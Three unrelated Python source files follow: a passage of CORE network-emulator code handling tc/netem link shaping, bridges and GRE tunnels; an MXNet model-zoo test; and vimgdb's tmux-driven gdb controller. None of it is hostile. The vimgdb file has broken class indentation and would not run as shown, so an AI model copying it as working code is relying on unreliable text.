        changed = False
        # bandwidth is shaped with a root tbf qdisc (handle 1:)
        if netif.setparam("bw", bw):
            # from tc-tbf(8): minimum value for burst is rate / kernel_hz
            if bw is not None:
                burst = max(2 * netif.mtu, bw / 1000)
                # max IP payload
                limit = 0xFFFF
                tbf = ["tbf", "rate", str(bw), "burst", str(burst), "limit", str(limit)]
            if bw > 0:
                if self.up:
                    logging.debug(
                        "linkconfig: %s" % ([tc + parent + ["handle", "1:"] + tbf],)
                    )
                    utils.check_cmd(tc + parent + ["handle", "1:"] + tbf)
                netif.setparam("has_tbf", True)
                changed = True
            elif netif.getparam("has_tbf") and bw <= 0:
                # zero/negative bandwidth removes the tbf shaper entirely
                tcd = [] + tc
                tcd[2] = "delete"
                if self.up:
                    utils.check_cmd(tcd + parent)
                netif.setparam("has_tbf", False)
                # removing the parent removes the child
                netif.setparam("has_netem", False)
                changed = True
        if netif.getparam("has_tbf"):
            # netem must be attached under the tbf qdisc when one exists
            parent = ["parent", "1:1"]
        netem = ["netem"]
        changed = max(changed, netif.setparam("delay", delay))
        if loss is not None:
            loss = float(loss)
        changed = max(changed, netif.setparam("loss", loss))
        if duplicate is not None:
            duplicate = int(duplicate)
        changed = max(changed, netif.setparam("duplicate", duplicate))
        changed = max(changed, netif.setparam("jitter", jitter))
        if not changed:
            return
        # jitter and delay use the same delay statement
        if delay is not None:
            netem += ["delay", "%sus" % delay]
        if jitter is not None:
            if delay is None:
                netem += ["delay", "0us", "%sus" % jitter, "25%"]
            else:
                netem += ["%sus" % jitter, "25%"]
        if loss is not None and loss > 0:
            netem += ["loss", "%s%%" % min(loss, 100)]
        if duplicate is not None and duplicate > 0:
            netem += ["duplicate", "%s%%" % min(duplicate, 100)]
        delay_check = delay is None or delay <= 0
        jitter_check = jitter is None or jitter <= 0
        loss_check = loss is None or loss <= 0
        duplicate_check = duplicate is None or duplicate <= 0
        if all([delay_check, jitter_check, loss_check, duplicate_check]):
            # possibly remove netem if it exists and parent queue wasn't removed
            if not netif.getparam("has_netem"):
                return
            tc[2] = "delete"
            if self.up:
                logging.debug("linkconfig: %s" % ([tc + parent + ["handle", "10:"]],))
                utils.check_cmd(tc + parent + ["handle", "10:"])
            netif.setparam("has_netem", False)
        elif len(netem) > 1:
            # at least one impairment is active: (re)install the netem qdisc
            if self.up:
                logging.debug(
                    "linkconfig: %s" % ([tc + parent + ["handle", "10:"] + netem],)
                )
                utils.check_cmd(tc + parent + ["handle", "10:"] + netem)
            netif.setparam("has_netem", True)

    def linknet(self, net):
        """
        Link this bridge with another by creating a veth pair and installing
        each device into each bridge.

        :param core.netns.vnet.LxBrNet net: network to link with
        :return: created interface
        :rtype: Veth
        """
        sessionid = self.session.short_session_id()
        # ids are rendered as hex when numeric, verbatim otherwise
        try:
            _id = "%x" % self.id
        except TypeError:
            _id = "%s" % self.id
        try:
            net_id = "%x" % net.id
        except TypeError:
            net_id = "%s" % net.id
        localname = "veth%s.%s.%s" % (_id, net_id, sessionid)
        # kernel interface names are limited to 15 characters
        if len(localname) >= 16:
            raise ValueError("interface local name %s too long" % localname)
        name = "veth%s.%s.%s" % (net_id, _id, sessionid)
        if len(name) >= 16:
            raise ValueError("interface name %s too long" % name)
        netif = Veth(
            node=None, name=name, localname=localname, mtu=1500, net=self, start=self.up
        )
        self.attach(netif)
        if net.up:
            # this is similar to net.attach() but uses netif.name instead
            # of localname
            utils.check_cmd([constants.BRCTL_BIN, "addif", net.brname, netif.name])
            utils.check_cmd([constants.IP_BIN, "link", "set", netif.name, "up"])
        i = net.newifindex()
        net._netif[i] = netif
        with net._linked_lock:
            net._linked[netif] = {}
        netif.net = self
        netif.othernet = net
        return netif

    def getlinknetif(self, net):
        """
        Return the interface of that links this net with another net
        (that were linked using linknet()).

        :param core.nodes.base.CoreNetworkBase net: interface to get link for
        :return: interface the provided network is linked to
        :rtype: core.nodes.interface.CoreInterface
        """
        for netif in self.netifs():
            if hasattr(netif, "othernet") and netif.othernet == net:
                return netif
        return None

    def addrconfig(self, addrlist):
        """
        Set addresses on the bridge.

        :param list[str] addrlist: address list
        :return: nothing
        """
        if not self.up:
            return
        for addr in addrlist:
            utils.check_cmd(
                [constants.IP_BIN, "addr", "add", str(addr), "dev", self.brname]
            )
class GreTapBridge(CoreNetwork):
    """
    A network consisting of a bridge with a gretap device for tunneling to
    another system.
    """

    def __init__(
        self,
        session,
        remoteip=None,
        _id=None,
        name=None,
        policy="ACCEPT",
        localip=None,
        ttl=255,
        key=None,
        start=True,
    ):
        """
        Create a GreTapBridge instance.

        :param core.emulator.session.Session session: core session instance
        :param str remoteip: remote address
        :param int _id: object id
        :param str name: object name
        :param policy: network policy
        :param str localip: local address
        :param ttl: ttl value
        :param key: gre tap key
        :param bool start: start flag
        """
        # bridge creation is deferred to this class's startup() below
        CoreNetwork.__init__(
            self, session=session, _id=_id, name=name, policy=policy, start=False
        )
        self.grekey = key
        if self.grekey is None:
            # derive a key unique to this session/node pair when none given
            self.grekey = self.session.id ^ self.id
        self.localnum = None
        self.remotenum = None
        self.remoteip = remoteip
        self.localip = localip
        self.ttl = ttl
        # without a remote address, the GreTap is created later via addrconfig()
        if remoteip is None:
            self.gretap = None
        else:
            self.gretap = GreTap(
                node=self,
                session=session,
                remoteip=remoteip,
                localip=localip,
                ttl=ttl,
                key=self.grekey,
            )
        if start:
            self.startup()

    def startup(self):
        """
        Creates a bridge and adds the gretap device to it.

        :return: nothing
        """
        CoreNetwork.startup(self)
        if self.gretap:
            self.attach(self.gretap)

    def shutdown(self):
        """
        Detach the gretap device and remove the bridge.

        :return: nothing
        """
        if self.gretap:
            self.detach(self.gretap)
            self.gretap.shutdown()
            self.gretap = None
        CoreNetwork.shutdown(self)

    def addrconfig(self, addrlist):
        """
        Set the remote tunnel endpoint. This is a one-time method for
        creating the GreTap device, which requires the remoteip at startup.
        The 1st address in the provided list is remoteip, 2nd optionally
        specifies localip.

        :param list addrlist: address list
        :return: nothing
        :raises ValueError: when a gretap device has already been created
        """
        if self.gretap:
            raise ValueError("gretap already exists for %s" % self.name)
        remoteip = addrlist[0].split("/")[0]
        localip = None
        if len(addrlist) > 1:
            localip = addrlist[1].split("/")[0]
        self.gretap = GreTap(
            session=self.session,
            remoteip=remoteip,
            localip=localip,
            ttl=self.ttl,
            key=self.grekey,
        )
        self.attach(self.gretap)

    def setkey(self, key):
        """
        Set the GRE key used for the GreTap device. This needs to be set
        prior to instantiating the GreTap device (before addrconfig).

        :param key: gre key
        :return: nothing
        """
        self.grekey = key
class CtrlNet(CoreNetwork):
    """
    Control network functionality.
    """

    policy = "ACCEPT"
    # base control interface index
    CTRLIF_IDX_BASE = 99
    # default ipv4 prefixes, one entry per control network
    DEFAULT_PREFIX_LIST = [
        "172.16.0.0/24 172.16.1.0/24 172.16.2.0/24 172.16.3.0/24 172.16.4.0/24",
        "172.17.0.0/24 172.17.1.0/24 172.17.2.0/24 172.17.3.0/24 172.17.4.0/24",
        "172.18.0.0/24 172.18.1.0/24 172.18.2.0/24 172.18.3.0/24 172.18.4.0/24",
        "172.19.0.0/24 172.19.1.0/24 172.19.2.0/24 172.19.3.0/24 172.19.4.0/24",
    ]

    def __init__(
        self,
        session,
        _id="ctrlnet",
        name=None,
        prefix=None,
        hostid=None,
        start=True,
        assign_address=True,
        updown_script=None,
        serverintf=None,
    ):
        """
        Creates a CtrlNet instance.

        :param core.emulator.session.Session session: core session instance
        :param int _id: node id
        :param str name: node name
        :param prefix: control network ipv4 prefix
        :param hostid: host id
        :param bool start: start flag
        :param bool assign_address: assign an address to the bridge when True
        :param str updown_script: updown script
        :param serverintf: server interface
        :return:
        """
        self.prefix = ipaddress.Ipv4Prefix(prefix)
        self.hostid = hostid
        self.assign_address = assign_address
        self.updown_script = updown_script
        self.serverintf = serverintf
        CoreNetwork.__init__(self, session, _id=_id, name=name, start=start)

    def startup(self):
        """
        Startup functionality for the control network.

        :return: nothing
        :raises CoreCommandError: when there is a command exception
        """
        # refuse to start when a stale bridge from an old session remains
        if self.detectoldbridge():
            return
        CoreNetwork.startup(self)
        if self.hostid:
            addr = self.prefix.addr(self.hostid)
        else:
            addr = self.prefix.max_addr()
        logging.info("added control network bridge: %s %s", self.brname, self.prefix)
        if self.assign_address:
            addrlist = ["%s/%s" % (addr, self.prefix.prefixlen)]
            self.addrconfig(addrlist=addrlist)
            logging.info("address %s", addr)
        if self.updown_script:
            logging.info(
                "interface %s updown script (%s startup) called",
                self.brname,
                self.updown_script,
            )
            utils.check_cmd([self.updown_script, self.brname, "startup"])
        if self.serverintf:
            # sets the interface as a port of the bridge
            utils.check_cmd(
                [constants.BRCTL_BIN, "addif", self.brname, self.serverintf]
            )
            # bring interface up
            utils.check_cmd([constants.IP_BIN, "link", "set", self.serverintf, "up"])

    def detectoldbridge(self):
        """
        Occasionally, control net bridges from previously closed sessions are not cleaned up.
        Check if there are old control net bridges and delete them

        :return: True if an old bridge was detected, False otherwise
        :rtype: bool
        """
        status, output = utils.cmd_output([constants.BRCTL_BIN, "show"])
        if status != 0:
            logging.error("Unable to retrieve list of installed bridges")
        else:
            lines = output.split("\n")
            # skip the brctl header row
            for line in lines[1:]:
                cols = line.split("\t")
                oldbr = cols[0]
                flds = cols[0].split(".")
                # bridge names are formatted "b.<id>.<session>"
                if len(flds) == 3:
                    # compare as strings: brname embeds str(self.id), so a
                    # numeric id would otherwise never match (bug fix)
                    if flds[0] == "b" and flds[1] == str(self.id):
                        logging.error(
                            "error: An active control net bridge (%s) found. "
                            "An older session might still be running. "
                            "Stop all sessions and, if needed, delete %s to continue.",
                            oldbr,
                            oldbr,
                        )
                        return True
        return False

    def shutdown(self):
        """
        Control network shutdown.

        :return: nothing
        """
        if self.serverintf is not None:
            try:
                utils.check_cmd(
                    [constants.BRCTL_BIN, "delif", self.brname, self.serverintf]
                )
            except CoreCommandError:
                logging.exception(
                    "error deleting server interface %s from bridge %s",
                    self.serverintf,
                    self.brname,
                )
        if self.updown_script is not None:
            try:
                logging.info(
                    "interface %s updown script (%s shutdown) called",
                    self.brname,
                    self.updown_script,
                )
                utils.check_cmd([self.updown_script, self.brname, "shutdown"])
            except CoreCommandError:
                logging.exception("error issuing shutdown script shutdown")
        CoreNetwork.shutdown(self)

    def all_link_data(self, flags):
        """
        Do not include CtrlNet in link messages describing this session.

        :param flags: message flags
        :return: list of link data
        :rtype: list[core.data.LinkData]
        """
        return []
class PtpNet(CoreNetwork):
    """
    Peer to peer network node.
    """

    # both endpoints may always exchange traffic
    policy = "ACCEPT"

    def attach(self, netif):
        """
        Attach a network interface, but limit attachment to two interfaces.

        :param core.netns.vif.VEth netif: network interface
        :return: nothing
        :raises ValueError: when two interfaces are already attached
        """
        if len(self._netif) >= 2:
            raise ValueError(
                "Point-to-point links support at most 2 network interfaces"
            )
        CoreNetwork.attach(self, netif)

    def data(self, message_type, lat=None, lon=None, alt=None):
        """
        Do not generate a Node Message for point-to-point links. They are
        built using a link message instead.

        :param message_type: purpose for the data object we are creating
        :param float lat: latitude
        :param float lon: longitude
        :param float alt: altitude
        :return: node data object
        :rtype: core.emulator.data.NodeData
        """
        return None

    def all_link_data(self, flags):
        """
        Build CORE API TLVs for a point-to-point link. One Link message
        describes this network.

        :param flags: message flags
        :return: list of link data
        :rtype: list[core.emulator.data.LinkData]
        """
        all_links = []
        # a ptp link is only reportable once both endpoints are attached
        if len(self._netif) != 2:
            return all_links
        if1, if2 = self._netif.values()
        unidirectional = 0
        # differing endpoint parameters require a second, reverse-direction message
        if if1.getparams() != if2.getparams():
            unidirectional = 1
        interface1_ip4 = None
        interface1_ip4_mask = None
        interface1_ip6 = None
        interface1_ip6_mask = None
        # collect the last ipv4 and ipv6 address configured on endpoint one
        for address in if1.addrlist:
            ip, _sep, mask = address.partition("/")
            mask = int(mask)
            if ipaddress.is_ipv4_address(ip):
                family = AF_INET
                ipl = socket.inet_pton(family, ip)
                interface1_ip4 = ipaddress.IpAddress(af=family, address=ipl)
                interface1_ip4_mask = mask
            else:
                family = AF_INET6
                ipl = socket.inet_pton(family, ip)
                interface1_ip6 = ipaddress.IpAddress(af=family, address=ipl)
                interface1_ip6_mask = mask
        interface2_ip4 = None
        interface2_ip4_mask = None
        interface2_ip6 = None
        interface2_ip6_mask = None
        # collect the last ipv4 and ipv6 address configured on endpoint two
        for address in if2.addrlist:
            ip, _sep, mask = address.partition("/")
            mask = int(mask)
            if ipaddress.is_ipv4_address(ip):
                family = AF_INET
                ipl = socket.inet_pton(family, ip)
                interface2_ip4 = ipaddress.IpAddress(af=family, address=ipl)
                interface2_ip4_mask = mask
            else:
                family = AF_INET6
                ipl = socket.inet_pton(family, ip)
                interface2_ip6 = ipaddress.IpAddress(af=family, address=ipl)
                interface2_ip6_mask = mask
        link_data = LinkData(
            message_type=flags,
            node1_id=if1.node.id,
            node2_id=if2.node.id,
            link_type=self.linktype,
            unidirectional=unidirectional,
            delay=if1.getparam("delay"),
            bandwidth=if1.getparam("bw"),
            per=if1.getparam("loss"),
            dup=if1.getparam("duplicate"),
            jitter=if1.getparam("jitter"),
            interface1_id=if1.node.getifindex(if1),
            interface1_mac=if1.hwaddr,
            interface1_ip4=interface1_ip4,
            interface1_ip4_mask=interface1_ip4_mask,
            interface1_ip6=interface1_ip6,
            interface1_ip6_mask=interface1_ip6_mask,
            interface2_id=if2.node.getifindex(if2),
            interface2_mac=if2.hwaddr,
            interface2_ip4=interface2_ip4,
            interface2_ip4_mask=interface2_ip4_mask,
            interface2_ip6=interface2_ip6,
            interface2_ip6_mask=interface2_ip6_mask,
        )
        all_links.append(link_data)
        # build a 2nd link message for the upstream link parameters
        # (swap if1 and if2)
        if unidirectional:
            link_data = LinkData(
                message_type=0,
                node1_id=if2.node.id,
                node2_id=if1.node.id,
                delay=if2.getparam("delay"),
                bandwidth=if2.getparam("bw"),
                per=if2.getparam("loss"),
                dup=if2.getparam("duplicate"),
                jitter=if2.getparam("jitter"),
                unidirectional=1,
                interface1_id=if2.node.getifindex(if2),
                interface2_id=if1.node.getifindex(if1),
            )
            all_links.append(link_data)
        return all_links
class SwitchNode(CoreNetwork):
    """
    Provides switch functionality within a core node.
    """

    # TLV API node type reported for this network
    apitype = NodeTypes.SWITCH.value
    # ACCEPT: forward between all attached interfaces by default
    policy = "ACCEPT"
    type = "lanswitch"
class HubNode(CoreNetwork):
    """
    Provides hub functionality within a core node, forwards packets to all bridge
    ports by turning off MAC address learning.
    """

    # TLV API node type reported for this network
    apitype = NodeTypes.HUB.value
    policy = "ACCEPT"
    type = "hub"

    def __init__(self, session, _id=None, name=None, start=True):
        """
        Creates a HubNode instance.

        :param core.session.Session session: core session instance
        :param int _id: node id
        :param str name: node name
        :param bool start: start flag
        :raises CoreCommandError: when there is a command exception
        """
        CoreNetwork.__init__(self, session, _id, name, start)
        # TODO: move to startup method
        if start:
            # ageing time 0 disables MAC learning, so every frame floods all ports
            utils.check_cmd([constants.BRCTL_BIN, "setageing", self.brname, "0"])
class WlanNode(CoreNetwork):
    """
    Provides wireless lan functionality within a core node.
    """

    # TLV API node and link types reported for this network
    apitype = NodeTypes.WIRELESS_LAN.value
    linktype = LinkTypes.WIRELESS.value
    # DROP by default: nodes only communicate when the wireless model links them
    policy = "DROP"
    type = "wlan"

    def __init__(self, session, _id=None, name=None, start=True, policy=None):
        """
        Create a WlanNode instance.

        :param core.session.Session session: core session instance
        :param int _id: node id
        :param str name: node name
        :param bool start: start flag
        :param policy: wlan policy
        """
        CoreNetwork.__init__(self, session, _id, name, start, policy)
        # wireless model such as basic range
        self.model = None
        # mobility model such as scripted
        self.mobility = None
        # TODO: move to startup method
        if start:
            # ageing time 0 disables MAC learning, hub-like flooding behavior
            utils.check_cmd([constants.BRCTL_BIN, "setageing", self.brname, "0"])

    def attach(self, netif):
        """
        Attach a network interface.

        :param core.nodes.interface.CoreInterface netif: network interface
        :return: nothing
        """
        CoreNetwork.attach(self, netif)
        if self.model:
            # let the wireless model react to future position updates
            netif.poshook = self.model.position_callback
            if netif.node is None:
                return
            x, y, z = netif.node.position.get()
            # invokes any netif.poshook
            netif.setposition(x, y, z)

    def setmodel(self, model, config):
        """
        Sets the mobility and wireless model.

        :param core.location.mobility.WirelessModel.cls model: wireless model to set to
        :param dict config: configuration for model being set
        :return: nothing
        """
        logging.debug("node(%s) setting model: %s", self.name, model.name)
        if model.config_type == RegisterTlvs.WIRELESS.value:
            self.model = model(session=self.session, _id=self.id)
            # re-bind position callbacks of already-attached interfaces
            for netif in self.netifs():
                netif.poshook = self.model.position_callback
                if netif.poshook and netif.node:
                    x, y, z = netif.node.position.get()
                    netif.poshook(netif, x, y, z)
            self.updatemodel(config)
        elif model.config_type == RegisterTlvs.MOBILITY.value:
            self.mobility = model(session=self.session, _id=self.id)
            self.mobility.update_config(config)

    def update_mobility(self, config):
        # push new configuration into the mobility model; requires one to be set
        if not self.mobility:
            raise ValueError("no mobility set to update for node(%s)", self.id)
        self.mobility.update_config(config)

    def updatemodel(self, config):
        # push new configuration into the wireless model and re-fire position hooks
        if not self.model:
            raise ValueError("no model set to update for node(%s)", self.id)
        logging.debug(
            "node(%s) updating model(%s): %s", self.id, self.model.name, config
        )
        self.model.update_config(config)
        for netif in self.netifs():
            if netif.poshook and netif.node:
                x, y, z = netif.node.position.get()
                netif.poshook(netif, x, y, z)

    def all_link_data(self, flags):
        """
        Retrieve all link data.

        :param flags: message flags
        :return: list of link data
        :rtype: list[core.emulator.data.LinkData]
        """
        all_links = CoreNetwork.all_link_data(self, flags)
        # the wireless model contributes its own dynamic links
        if self.model:
            all_links.extend(self.model.all_link_data(flags))
        return all_links
class TunnelNode(GreTapBridge):
    """
    Provides tunnel functionality in a core node.
    """

    # TLV API node type reported for this network
    apitype = NodeTypes.TUNNEL.value
    policy = "ACCEPT"
    type = "tunnel"
|
test_gluon_model_zoo.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
from common import setup_module, with_seed, teardown_module
import multiprocessing
import pytest
def eprint(*args, **kwargs):
    """Print *args* to standard error, forwarding all print() keyword options."""
    stream = sys.stderr
    print(*args, file=stream, **kwargs)
@with_seed()
@pytest.mark.parametrize('model_name', [
    'resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
    'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
    'vgg11', 'vgg13', 'vgg16', 'vgg19',
    'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
    'alexnet', 'inceptionv3',
    'densenet121', 'densenet161', 'densenet169', 'densenet201',
    'squeezenet1.0', 'squeezenet1.1',
    'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
    'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25'
])
def test_models(model_name):
    """Instantiate each model-zoo network and run a single forward pass."""
    # only this small model is exercised with pretrained weights (download cost)
    use_pretrained = model_name in {'mobilenetv2_0.25'}
    net = get_model(model_name, pretrained=use_pretrained, root='model/')
    # inception networks require a larger input resolution
    if 'inception' in model_name:
        data_shape = (2, 3, 299, 299)
    else:
        data_shape = (2, 3, 224, 224)
    eprint('testing forward for %s' % model_name)
    print(net)
    if not use_pretrained:
        net.initialize()
    net(mx.nd.random.uniform(shape=data_shape)).wait_to_read()
def parallel_download(model_name):
    """Worker: fetch a pretrained model into a dedicated download directory."""
    downloaded = get_model(model_name, pretrained=True, root='./parallel_download')
    print(type(downloaded))
@with_seed()
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
    """Spawn several processes downloading the same pretrained model at once."""
    name = 'mobilenetv2_0.25'
    workers = [
        multiprocessing.Process(target=parallel_download, args=(name,))
        for _ in range(10)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
|
appcontroller.py | import os
import sys
import re
import time
import json
import codecs
import os.path
import subprocess
import threading
from typing import Dict, List
from libtmux.pane import Pane
from libtmux.server import Server
from libtmux.window import Window
from vimgdb.base.common import Common
from vimgdb.base.controller import Controller, GdbMode
from vimgdb.controller.workspace import Workspace
from vimgdb.model.gdb import Gdb
from vimgdb.model.gdbserver import GdbServer
from vimgdb.model.cursor import Cursor
from vimgdb.model.breakpoint import Breakpoint
from vimgdb.view.win import Win
class AppController(Controller):
"""Main application class."""
def __init__(self, common: Common, args):
    """Initialize controller state; tmux/gdb objects are created later in run()."""
    super().__init__(common, type(self).__name__)
    self._scriptdir = os.path.dirname(os.path.abspath(__file__))
    self._common = common
    self.is_exit = False
    self.workdir = os.getcwd()
    self.file = ''
    # binary under debug; overwritten from the VimGdb() call arguments in run()
    self.debug_bin = "t1"
    # tmux handles, populated by run()/build_set_current()
    self.tmux_server = None
    self.tmux_session = None
    self.tmux_pwin_idx = ''
    self.tmux_window_vim = None
    self.tmux_curr_pan_id = ''
    self.tmux_pan_vim = None
    self.tmux_pan_gdb = None
    self.tmux_pan_gdbserver = None
    self.tmux_sesname = ""
    self.tmux_sesid = ""
    # fallback window geometry; replaced by the real values queried from tmux
    self.tmux_win_def_width = 800
    self.tmux_win_def_height = 600
    # layout/workspace bookkeeping
    self.layout_conf = {}
    self.workSpace = None
    self.workLayouts = {}
    self.helper = {}
    self.helper['worklayouts_loaded'] = False
    # gdb/gdbserver model contexts and their launch command lines
    self.ctx_gdb = None
    self.ctx_gdbserver = None
    self.cmd_gdb = ""
    self.cmd_gdbserver = ''
    self.curr_layout = ''
    # self.breakpoint = Breakpoint(common)
    # self.cursor = Cursor(common)
    # self.win = Win(common, self.cursor)
def _wrap_async(self, func):
    """
    Return a wrapper that invokes *func* on the main thread.

    pynvim requires its API to be called from the main thread, so the
    wrapper routes every invocation through ``vim.async_call``.

    Related issue: https://github.com/numirias/semshi/issues/25
    """
    def trampoline(*args, **kwargs):
        return self.vim.async_call(func, *args, **kwargs)
    return trampoline
def create_gdb_local(self, args):
    """Create the local-debug Gdb model bound to its tmux pane and register it."""
    modelGdb = Gdb(self._common,
            self,
            self.tmux_window_vim,
            self.workSpace.get_pane(self.curr_layout, Common.tmux_pane_builtin_gdb),
            self.debug_bin, self.gdb_output)
    if not modelGdb:
        return
    self.models_coll[modelGdb._name] = modelGdb
    # expose the model name to vimscript
    # self.vim.command('let g:vimgdb_gdb = ' + modelGdb._name)
    self.vim.vars['vimgdb_gdb'] = modelGdb._name
    # refresh libtmux's cached window/pane state after pane creation
    self.tmux_server._update_windows()
    self.tmux_server._update_panes()
def create_gdb_remote(self, args):
    """Create the remote-debug GdbServer model bound to its tmux pane and register it."""
    modelGdbserver = GdbServer(self._common, self,
            self.tmux_window_vim,
            self.workSpace.get_pane(self.curr_layout, Common.tmux_pane_builtin_gdbserver),
            self.debug_bin, self.gdbserver_output)
    if not modelGdbserver:
        return
    self.models_coll[modelGdbserver._name] = modelGdbserver
    # expose the model name to vimscript
    # self.vim.command('let g:vimgdb_gdbserver = ' + modelGdbserver._name)
    self.vim.vars['vimgdb_gdbserver'] = modelGdbserver._name
    # refresh libtmux's cached window/pane state after pane creation
    self.tmux_server._update_windows()
    self.tmux_server._update_panes()
def _define_vimsigns(self):
    """Register vim signs for the current-line marker and breakpoint states."""
    # Define the sign for current line the debugged program is executing.
    self.vim.call('sign_define', 'GdbCurrentLine',
            {'text': self.vim.vars['vimgdb_sign_currentline'],
             'texthl': self.vim.vars['vimgdb_sign_currentline_color']})
    # Define signs for the breakpoints.
    breaks = self.vim.vars['vimgdb_sign_breakpoints']
    for i, brk in enumerate(breaks):
        #sign define GdbBreakpointEn text=● texthl=Search
        #sign define GdbBreakpointDis text=● texthl=Function
        #sign define GdbBreakpointDel text=● texthl=Comment
        # one enabled/disabled sign pair per configured breakpoint glyph
        self.vim.call('sign_define', f'GdbBreakpointEn{i+1}',
                {'text': brk,
                 'texthl': self.vim.vars['vimgdb_sign_breakp_color_en']})
        self.vim.call('sign_define', f'GdbBreakpointDis{i+1}',
                {'text': brk,
                 'texthl': self.vim.vars['vimgdb_sign_breakp_color_dis']})
        # track how many breakpoint sign variants exist
        Common.vimsign_break_max += 1
def list_layout(self):
    """Echo the names of all known layouts in vim's message area."""
    # trailing ", " after the final name matches the historical output format
    names = "".join(f"{layout}, " for layout in self.workLayouts)
    self.vim.command(f'echomsg "VimGdb layout: `{names}`"')
def load_layout_conf(self):
    """Load tmux layout definitions: the user config file when present, else the bundled default."""
    default_file = self._scriptdir + "/../config/default.json"
    if os.path.isfile(Common.vimgdb_conffile):
        self.conf = Common.vimgdb_conffile
    else:
        self.conf = default_file
    with open(self.conf, 'r') as conf_file:
        self.layout_conf = json.loads(conf_file.read())
def build_workspace(self):
    """Load the layout config, create the tmux Workspace, and build the current layout."""
    self.load_layout_conf()
    # map of builtin pane names to the shell command each pane should run
    tmux_builtin_panes = {}
    self.helper[Common.tmux_builtin_panes] = tmux_builtin_panes
    tmux_builtin_panes[Common.tmux_pane_builtin_main] = ''
    tmux_builtin_panes[Common.tmux_pane_builtin_gdb] = Gdb.get_cmdstr(self._scriptdir, self.debug_bin)
    # Avoid starting gdbserver too early; wait until gdb is done.
    #tmux_builtin_panes[Common.tmux_pane_builtin_gdbserver] = GdbServer.get_cmdstr(self._scriptdir, self.debug_bin)
    tmux_builtin_panes[Common.tmux_pane_builtin_gdbserver] = ''
    self.workSpace = Workspace(self._common,
            self.layout_conf,
            self.helper[Common.tmux_builtin_panes],
            self.workdir,
            self.tmux_server, self.tmux_win_def_width, self.tmux_win_def_height)
    self.build_set_current()
    # choose the layout matching the requested gdb mode
    if self.gdbMode == GdbMode.LOCAL:
        self.curr_layout = Common.tmux_layout_local
    elif self.gdbMode == GdbMode.REMOTE:
        self.curr_layout = Common.tmux_layout_remote
    self.build_all_layout_codes()
    self.build_layout(self.curr_layout)
def build_all_layout_codes(self):
    """Compute tmux layout strings for every configured layout (only once per session)."""
    if self.workLayouts and self.helper['worklayouts_loaded']:
        self.logger.info(f"connect Existed and don't need create layout={self.workLayouts}")
        return
    self.helper['worklayouts_loaded'] = True
    self.workLayouts.update(self.workSpace.build_all_layout_codes(Common.tmux_vimgdb_session_name))
    self.logger.info(f"connect layout={self.workLayouts}")
def build_set_current(self):
    """
    Bind the controller to the tmux window/pane vim is currently attached to.

    Reuses the existing tmux window instead of creating a dedicated one, and
    names the window and pane so the workspace builder can locate them.
    """
    # Tmux: reuse current tmux-window, but close all other panes in current window
    # for only current vim is the controled vim instance.
    self.tmux_window_vim = self.tmux_session.attached_window
    assert isinstance(self.tmux_window_vim, Window)
    # window carries the active layout name
    self.tmux_window_vim['window_name'] = self.curr_layout
    self.tmux_pane_vim = self.tmux_window_vim.attached_pane
    assert isinstance(self.tmux_pane_vim, Pane)
    # pane is tagged as the builtin "main" (vim) pane
    self.tmux_pane_vim['pane_name'] = Common.tmux_pane_builtin_main
def build_layout(self, layout: str):
    """Build/apply one named layout in the current tmux window."""
    self.logger.info(f"connect rebuild layout '{layout}'")
    self.workSpace.build_one_layout(layout,
            self.tmux_session,
            self.tmux_window_vim,
            self.tmux_pane_vim,
            Common.tmux_pane_builtin_main)
def layout_select(self, layout: str):
    """Switch to a named layout, rebuilding panes when necessary."""
    if layout not in self.workLayouts:
        self.vim.command(f'echomsg "VimGdb layout `{layout}` not exist, check VimGdbLayoutList()"')
        return
    # select_layout() only rearranges existing panes
    # But can't create new pane
    #self.tmux_window_vim.select_layout(self.workLayouts[layout]['layout'])
    self.workSpace.build_one_layout(layout,
            self.tmux_session,
            self.tmux_window_vim,
            self.tmux_pane_vim,
            Common.tmux_pane_builtin_main)
def run(self, args):
    """Entry point of the Gdb instance.

    Truncates all log/IPC files, takes over the current tmux window,
    creates the Cursor/Breakpoint models and the main vim view, then
    launches gdb locally and/or remotely depending on the mode.

    :param args: ``[gdb_mode, gdb_args]`` — mode is GdbMode.LOCAL/REMOTE,
        gdb_args begins with the binary to debug followed by its options.
    """
    # Recreate the debug log as an empty file.
    os.system(f'touch {Common.vimgdb_debugfile}; truncate -s 0 {Common.vimgdb_debugfile}')
    self.logger.info("==============================================")
    self.logger.info("==============================================")
    self.logger.info("==============================================")
    self.logger.info("==============================================")
    self.logger.info(" *** Gdb instance ***")
    self.logger.info("")
    self.logger.info("args=%s", args)
    arg_n = len(args)
    if arg_n < 2:
        self.vim.command('echomsg "Gdb start fail, should: call VimGdb(\'local\', \'<bin-file>\')"')
        return
    # Truncate (or create) every file used to exchange data with gdb/gdbserver.
    os.system(f'touch {Common.gdb_output}; truncate -s 0 {Common.gdb_output}')
    os.system(f'touch {Common.gdbserver_output}; truncate -s 0 {Common.gdbserver_output}')
    os.system(f'touch {Common.vimqf_backtrace}; truncate -s 0 {Common.vimqf_backtrace}')
    os.system(f'touch {Common.vimqf_breakpoint}; truncate -s 0 {Common.vimqf_breakpoint}')
    os.system(f'touch {Common.gdb_tmp_break}; truncate -s 0 {Common.gdb_tmp_break}')
    os.system(f'touch {Common.gdb_file_infolocal}; truncate -s 0 {Common.gdb_file_infolocal}')
    self.gdbMode = args[0]
    self.gdbArgs = args[1]  # 't1 dut:8888 -u admin -p "" -t "gdb:trace"'
